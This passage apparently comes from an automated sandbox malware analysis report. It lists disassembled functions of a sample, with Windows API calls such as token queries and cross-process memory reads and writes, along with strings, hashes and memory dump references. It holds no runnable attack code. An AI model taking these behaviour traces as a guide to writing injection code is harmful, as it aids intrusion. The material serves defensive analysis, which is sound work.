                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568AE1
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568AF7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                          • Instruction ID: ae1ae6f58f05307e2a6a9c8ccb0e928b6ed6a80197f93d43cb96699e57cad1e0
                          • Opcode Fuzzy Hash: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                          • Instruction Fuzzy Hash: 48F03C71210204AFEB210FA59C8DEB73BADFF5A758F500115F945871A0CB61DC45EA60
                          Function 00568B0B Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568B22
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568B2C
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B3B
                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B42
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B58
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                          • Instruction ID: 77acaf66aab1b4291f7ed49611c5ec66639b5a88b9683c2b6f7e4729eccfcba9
                          • Opcode Fuzzy Hash: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                          • Instruction Fuzzy Hash: E7F03C71210204AFEB110FA5EC8CFB73BADFF4A754F100129F945861A0DB61D995EA64
                          Function 0056CB5F Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0056CB73
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0056CB8A
                          • MessageBeep.USER32(00000000), ref: 0056CBA2
                          • KillTimer.USER32(?,0000040A), ref: 0056CBBE
                          • EndDialog.USER32(?,00000001), ref: 0056CBD8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 690af26a14745b7512e92f99536689c04b710bffc75be9afb9ad33aa5f1fba55
                          • Instruction ID: f50d1721a911725db1143c36578ffa6f97a4b3995e3c1dd64baf09f5d87d3aa3
                          • Opcode Fuzzy Hash: 690af26a14745b7512e92f99536689c04b710bffc75be9afb9ad33aa5f1fba55
                          • Instruction Fuzzy Hash: C5016D30550708ABEB215F60DD8EFA6BFB8FF11709F440659E582A24E0DBF4A9589F90
                          Function 0051178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 0051179B
                          • StrokeAndFillPath.GDI32(?,?,0054BAF9,00000000,?), ref: 005117B7
                          • SelectObject.GDI32(?,00000000), ref: 005117CA
                          • DeleteObject.GDI32 ref: 005117DD
                          • StrokePath.GDI32(?), ref: 005117F8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 9c29a7c96099404d32d70f2784d946ea1a8ad96681113bd0643f02467b1335ea
                          • Instruction ID: 891f737a54a17ae76502eae2c98fee736c8ed3aece326f27f5580bcf49150946
                          • Opcode Fuzzy Hash: 9c29a7c96099404d32d70f2784d946ea1a8ad96681113bd0643f02467b1335ea
                          • Instruction Fuzzy Hash: 0FF01430002609ABEB215F66ED4CB993FE4FB22322F048256E929541F0C735899BFF25
                          Function 0057C847 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0057C8E2
                          • CoCreateInstance.OLE32(005A3D3C,00000000,00000001,005A3BAC,?), ref: 0057C8FA
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • CoUninitialize.OLE32 ref: 0057CB67
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_memmove
                          • String ID: .lnk
                          • API String ID: 2683427295-24824748
                          • Opcode ID: e5c9aeebe332bd01d8fe65136bf671b3c588a3be2521d3130d6bb151ee6af3a0
                          • Instruction ID: 826da12bcb6e25019656f6596a22a6fe5d313c8c0e2e9dbab2735641969251cf
                          • Opcode Fuzzy Hash: e5c9aeebe332bd01d8fe65136bf671b3c588a3be2521d3130d6bb151ee6af3a0
                          • Instruction Fuzzy Hash: 03A14CB1104206AFE300EF64D885EABBBE8FF95754F40491CF15597292EB70EE49CB92
                          Function 0051E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00521680: _memmove.LIBCMT ref: 005216DB
                          • __swprintf.LIBCMT ref: 0051E598
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0051E431
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: ad4c8dcfa0c0f4c3ae31a14440f0843edd9e05679e7e42cc6cdb8dc4af5c1259
                          • Instruction ID: 938a6829fa1a4cb1307074dca82999a8646c45243d430f080e05e24207d99a7e
                          • Opcode Fuzzy Hash: ad4c8dcfa0c0f4c3ae31a14440f0843edd9e05679e7e42cc6cdb8dc4af5c1259
                          • Instruction Fuzzy Hash: 6C9160715046129FD714EF24D89ACAF7BA5BFD5700F40491DF842972A1EA30EE84CB96
                          Function 0053516D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 005351FD
                            • Part of subcall function 00540250: __87except.LIBCMT ref: 0054028B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: b1e2e33d814d198f2cb52cad201c7344b89b36cb6e44c83e9529f7af432b3057
                          • Instruction ID: 4dad3e2d2fb052833ab6d73088b1fbc3bc609ea80ff4a4c447af755c73522521
                          • Opcode Fuzzy Hash: b1e2e33d814d198f2cb52cad201c7344b89b36cb6e44c83e9529f7af432b3057
                          • Instruction Fuzzy Hash: FC51547490CA0287DB11BB14C9553BE3F90BB90754F30AD68F5C6862E9FE348CD8EA46
                          Function 0053057F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          • Opcode ID: e044d1e05e3dcfcdd386b28ba87fa439239c607dc809764f59287df60a7884e3
                          • Instruction ID: cce4b4130596ccbc7d6b7db2a3ee63cc552ade77d3bf22293a0e59839e021237
                          • Opcode Fuzzy Hash: e044d1e05e3dcfcdd386b28ba87fa439239c607dc809764f59287df60a7884e3
                          • Instruction Fuzzy Hash: 5C512E751042569FDF259F28D4566FA7FA0FFA6320F544066E8829B2E0DB30DD62CB60
                          Function 0051E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$_free
                          • String ID: #VR
                          • API String ID: 2620147621-2899241889
                          • Opcode ID: 31762158b29fd8dd724c3db32afe635e6c1cd59cdd4e26b5e097e221d1bacd62
                          • Instruction ID: 658f8d26b1dea12ec63a84b9573365e796074e9c963caeab7c88ec3b180ecbbd
                          • Opcode Fuzzy Hash: 31762158b29fd8dd724c3db32afe635e6c1cd59cdd4e26b5e097e221d1bacd62
                          • Instruction Fuzzy Hash: 43515B71A083418FEB24CF28C495B6BBBE1FFC5314F54492DE989872A0E731E845CB52
                          Function 0052CF08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$_memmove
                          • String ID: ERCP
                          • API String ID: 2532777613-1384759551
                          • Opcode ID: a13f0fa6255bedbbdcd1498bff738d75557ddcf2ee0f51470873eb1d88b53227
                          • Instruction ID: a1c2aa119a6123bd4fd28e0163c4fc9d4fa32276e11adb886409dceba15e87f2
                          • Opcode Fuzzy Hash: a13f0fa6255bedbbdcd1498bff738d75557ddcf2ee0f51470873eb1d88b53227
                          • Instruction Fuzzy Hash: 3951EE70900719CBDB24CF64D889BAABFF4FF05300F24456EE84ACB291E370AA418B90
                          Function 0056A190 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00571B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569C31,?,?,00000034,00000800,?,00000034), ref: 00571B51
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056A1DA
                            • Part of subcall function 00571AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00571B1C
                            • Part of subcall function 00571A49: GetWindowThreadProcessId.USER32(?,?), ref: 00571A74
                            • Part of subcall function 00571A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00569BF5,00000034,?,?,00001004,00000000,00000000), ref: 00571A84
                            • Part of subcall function 00571A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00569BF5,00000034,?,?,00001004,00000000,00000000), ref: 00571A9A
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A247
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A294
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: ab4fc2e4b20f6a693d6c0957bf43418413b8a40808ccb84470b454d4eaa831d7
                          • Instruction ID: 52d3ece894528d236438e86608f30dd8b53621874b9359d8e8fbe9dd15510449
                          • Opcode Fuzzy Hash: ab4fc2e4b20f6a693d6c0957bf43418413b8a40808ccb84470b454d4eaa831d7
                          • Instruction Fuzzy Hash: B8413E76901119AFDB10DF98DC85EDEBBB8FB49300F004095F949B7181DA71AE89DBA1
                          Function 005977C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0059784E
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597862
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00597886
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: e7ae46507abcf81593291ee54d4673a7e386e7af3bbf74191ea802d1afe92fd0
                          • Instruction ID: 1c24a796fb3f8d33f4f4df1debbeb5e635ab54c1b24c16f7682559d22fcf33d3
                          • Opcode Fuzzy Hash: e7ae46507abcf81593291ee54d4673a7e386e7af3bbf74191ea802d1afe92fd0
                          • Instruction Fuzzy Hash: 1221AD3261021DABDF118E94CC46FEA3F69FF8C714F110215FE586B190D6B5A855DBA0
                          Function 0059709D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00597128
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00597138
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0059715D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 77c41e013029ab55ef6f31342f11e7c01b8eaa1f850bd213afd9e1f0b9ddd482
                          • Instruction ID: ea615444155e1663e9322a3839ba0fc8aa5a6e82c60b451ae476fd3dd2bf0c74
                          • Opcode Fuzzy Hash: 77c41e013029ab55ef6f31342f11e7c01b8eaa1f850bd213afd9e1f0b9ddd482
                          • Instruction Fuzzy Hash: FE218E3262411CBFEF118F54DC45FBB3BAAFB89764F018126FA059B190C671AC51DBA0
                          Function 00597AFB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597B5F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597B74
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597B81
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 88b4ccff0173c0daee6aa90d18e61d8a19926354b1a94f97bd5038b3f68e44ed
                          • Instruction ID: d670a3787cfa57a60ac57d864e038640ac0712cd9c6e97549ce16fe0e74e4e28
                          • Opcode Fuzzy Hash: 88b4ccff0173c0daee6aa90d18e61d8a19926354b1a94f97bd5038b3f68e44ed
                          • Instruction Fuzzy Hash: 1811C13225420CBEEF209E65CC06FEB3FAAFB89768F110519FA55A6090E671E851DB10
                          Function 0054B421 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0054B474: _memset.LIBCMT ref: 0054B481
                            • Part of subcall function 00530A9F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B450,?,?,?,0051100A), ref: 00530AA4
                          • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B454
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B463
                          Strings
                          • =[, xrefs: 0054B444
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B45E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=[
                          • API String ID: 3158253471-134945641
                          • Opcode ID: 0111c5503c427c486828b5c9895df53e88b5dc280c537313e7c415fefbd2b7d0
                          • Instruction ID: b9de1d0bd9f443b93d8d96f7ad0af1cbbbb2065085a2e133f1351588cc7bd8a5
                          • Opcode Fuzzy Hash: 0111c5503c427c486828b5c9895df53e88b5dc280c537313e7c415fefbd2b7d0
                          • Instruction Fuzzy Hash: 56E06D742007128FEB209F79E4087827FE0BF19348F00891EE486C2291E7B5E548CB51
                          Function 0058C4A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005501AA,?), ref: 0058C4AF
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C4C1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: b00b03a230218dfaedb5758b6365a47f501cb19a97e71d08f0f2fdb4c947ffe5
                          • Instruction ID: 11dc93bfcdc8790bb3ebd7a89bdf0bdda988bd03ac1a689fa349eebefb39a00f
                          • Opcode Fuzzy Hash: b00b03a230218dfaedb5758b6365a47f501cb19a97e71d08f0f2fdb4c947ffe5
                          • Instruction Fuzzy Hash: 4DE0C2345107128FEF206B25CC18BA27ED4BF2578AB00D429EC8AE22B0D7B0C880C720
                          Function 00524B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00524B44,?,005249D4,?,?,005227AF,?,00000001), ref: 00524B85
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00524B97
                          Strings
                          Memory Dump Source
